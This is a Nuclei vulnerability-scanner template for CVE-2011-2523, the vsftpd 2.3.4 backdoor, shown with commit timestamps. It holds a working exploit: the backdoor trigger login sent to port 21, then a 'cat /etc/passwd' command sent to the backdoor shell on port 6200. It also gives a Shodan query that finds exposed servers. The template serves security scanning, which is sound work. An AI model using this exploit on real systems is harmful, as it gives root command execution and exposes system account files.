nuclei-templates/network/cves/2011/CVE-2011-2523.yaml

54 lines
2.1 KiB
YAML
Raw Permalink Normal View History

2023-03-03 09:30:28 +00:00
id: CVE-2011-2523
info:
name: VSFTPD 2.3.4 - Backdoor Command Execution
author: pussycat0x
severity: critical
description: |
2023-03-03 09:39:15 +00:00
VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server.
2023-09-06 13:28:19 +00:00
remediation: |
Update to the latest version of VSFTPD, which does not contain the backdoor.
2023-07-16 13:29:08 +00:00
reference:
2023-03-03 09:30:28 +00:00
- https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
- https://www.exploit-db.com/exploits/49757
2023-07-16 13:29:08 +00:00
- http://packetstormsecurity.com/files/162145/vsftpd-2.3.4-Backdoor-Command-Execution.html
- https://access.redhat.com/security/cve/cve-2011-2523
- https://security-tracker.debian.org/tracker/CVE-2011-2523
2023-03-03 09:39:15 +00:00
classification:
2023-07-16 13:29:08 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-03-03 09:39:15 +00:00
cve-id: CVE-2011-2523
2023-07-16 13:29:08 +00:00
cwe-id: CWE-78
epss-score: 0.85861
epss-percentile: 0.98557
2023-07-16 13:29:08 +00:00
cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:*
2023-03-03 09:30:28 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 13:28:19 +00:00
max-request: 2
2023-07-16 13:29:08 +00:00
vendor: vsftpd_project
product: vsftpd
2023-09-06 13:28:19 +00:00
shodan-query: product:"vsftpd"
tags: packetstorm,cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project,tcp
2023-03-03 09:30:28 +00:00
variables:
2023-03-28 11:22:10 +00:00
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
tcp:
2023-07-16 13:29:08 +00:00
- host:
2023-09-16 19:35:21 +00:00
- "{{Hostname}}"
port: 21
2023-07-16 13:29:08 +00:00
inputs:
2023-03-03 09:30:28 +00:00
- data: "USER letmein:)\r\nPASS please\r\n"
read: 100
2023-07-16 13:29:08 +00:00
- host:
- "{{Host}}:6200"
inputs:
2023-03-03 09:30:28 +00:00
- data: "{{cmd}}\n"
read: 100
matchers:
2023-03-03 09:39:15 +00:00
- type: regex
2023-03-03 09:30:28 +00:00
part: raw
2023-03-03 09:39:15 +00:00
regex:
- "root:.*:0:0:"
# digest: 4b0a00483046022100f59d59f9529a3517843c071ba3e71d6f96554a7f73de8ca270d9065e52010ca1022100dfa4c6d38a6df1d03ea6c03dadd88e835917e0b144fcd588cc7f399889b27a38:922c64590222798bb761d5b6d8e72950